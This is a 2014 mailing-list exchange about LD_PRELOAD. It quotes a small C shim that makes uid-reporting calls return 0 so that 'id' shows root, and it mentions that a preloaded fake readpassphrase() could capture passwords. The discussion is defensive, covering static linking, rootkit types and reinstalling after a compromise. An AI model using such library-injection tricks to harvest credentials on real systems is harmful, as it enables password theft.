Em 17-02-2014 10:59, Daniel Cegiełka escreveu: > 2014-02-17 13:15 GMT+01:00 <[email protected]>: >> On 16. februar 2014 at 10:11 PM, "Daniel Cegiełka" >> <[email protected]> wrote: >> >> try this: >> >> --- cat id0.c --- >> int getuid(){return 0;} >> int geteuid(){return 0;} >> int getgid(){return 0;} >> int getegid(){return 0;} >> --- end cut --- >> >> # shell (as normal user): >> id -un >> cc -shared id0.c -o id0 >> LD_PRELOAD=./id0 sh >> id -un >> >> >> What does that do? >> >> O.D. > Nothing (it's safe to self-test, so have fun). id (or whoami) think > that calls functions from libc, but it really calls functions that are > loaded by LD_PRELOAD. These fake functions return 0, so id (whoami) > think that you are root. Attacks with LD_PRELOAD are very old and can > be performed on any OS where you have dynamic linking (Linux, *BSD > etc.), so yes, OpenBSD is "vulnerable" to this type of stuff. > > The real attack can be done by loading e.g. fake readpassphrase() function. > > http://www.openbsd.org/cgi-bin/man.cgi?query=readpassphrase&sektion=3 > > readpassphrase() is used e.g. in /usr/libexec/auth/login_* stuff, > signify, ssh, ssh-keygen, ssh-agent, nc, ftp etc. Each of these > programs are dynamically linked, so are LD_PRELOAD sensitive. If an > attacker __can__ LD_PRELOAD false readpassphrase(), will e.g. be able > to get to know your password. > > Solution: static linking of critical binaries. > > I hope that my explanation was helpful. > > best regards, > Daniel > Static linking does solves the issue with this particular rootkit, but won't help with kmod rootkits. The truth is that there is no bullet proof in any case, if your machine was compromised, you should assume that it has some form of rootkit and should proceed with the full re-installation of the OS. And you should scan very throughly your backups to assure that they won't reinstall the rootkit. I'm not even mentioning other forms of rootkits that are OS agnostic, such as BIOS, MBR, etc. There are even HDD controller's backdoors these days: http://spritesmods.com/?art=hddhack.
Cheers, -- Giancarlo Razzolini GPG: 4096R/77B981BC
